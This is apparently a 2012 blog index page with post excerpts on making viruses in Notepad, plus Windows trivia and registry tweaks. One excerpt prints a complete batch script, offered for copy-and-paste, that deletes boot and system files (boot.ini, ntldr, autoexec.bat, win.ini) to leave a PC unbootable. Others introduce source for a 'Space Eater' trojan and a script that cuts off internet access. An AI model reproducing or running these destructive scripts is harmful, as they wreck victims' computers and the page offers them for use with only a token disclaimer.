
Saturday, 11 August 2012
Space Eater(VIRUS) code

This is an virus source code. only for educational purpose DO NOT SPREAD IT.. It is harmful program.
BEWARE:-Do not compile it in your own pcs. do not recognize by any of the antivirus...
/* SPACE EATER TROJAN . USE IT FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD!*/
#include<stdio.h>
#include<conio.h>
#include<dos.h>
#include<stdlib.h>
FILE...
10 Interesting facts about Microsoft

Almost every one Knows Microsoft and its operating System Windows. But you will probably not know the following 10 interesting facts!
1. No one knows the reason, but it is impossible to create a folder named "con" or "Con". It is just not possible. And if you try to fool Windows...
Tuesday, 7 August 2012
How make a virus in Notepad-2

SHUT UR INTERNET PERMANENTLY:::
This is a slightly more advanced one. It shuts down your internet permanately. I tried it on
myself accidently, i knew what it did, and it still took me a couple of days to get my internet
back. works best on XP, not tested on vista or 7.
EDIT:...
How make a virus in Notepad-1

How to crash a PC Forever !:::
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
Open up notepad and copy and paste that. Save...
QoS Bandwidth Reserve Setting - Faster Internet Connection
Beware Editing in the registry files can slow down your computer
By default, Windows XP reserves 20% of the connection bandwidth for QoS traffic। This tweak allows the setting to be altered to a different percentage of connection bandwidth। If the system uses more than a single adapter for network connections, each adapter may be set
individually...
Registry Tricks for Windows - Clear Pagefile on Shutdown
Beware Editing in the registry files can slow down your computer
As an added security precaution it is possible to clear all data that has been written to the
page file so it cannot be retrieved. The downside to this tweak is that it may substantially increase shutdown time depending on the amount of data in the page file.
[Start]...